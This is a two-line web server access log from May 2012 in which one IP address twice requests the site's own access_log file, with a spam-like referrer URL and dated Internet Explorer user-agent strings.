78.137.37.171 - - [14/May/2012:10:28:59 +0200] "GET /logs/access_log HTTP/1.0" 200 1944745 "http://androidusplay.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:10:29:00 +0200] "GET /logs/access_log HTTP/1.0" 200 1945013 "http://androidusplay.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
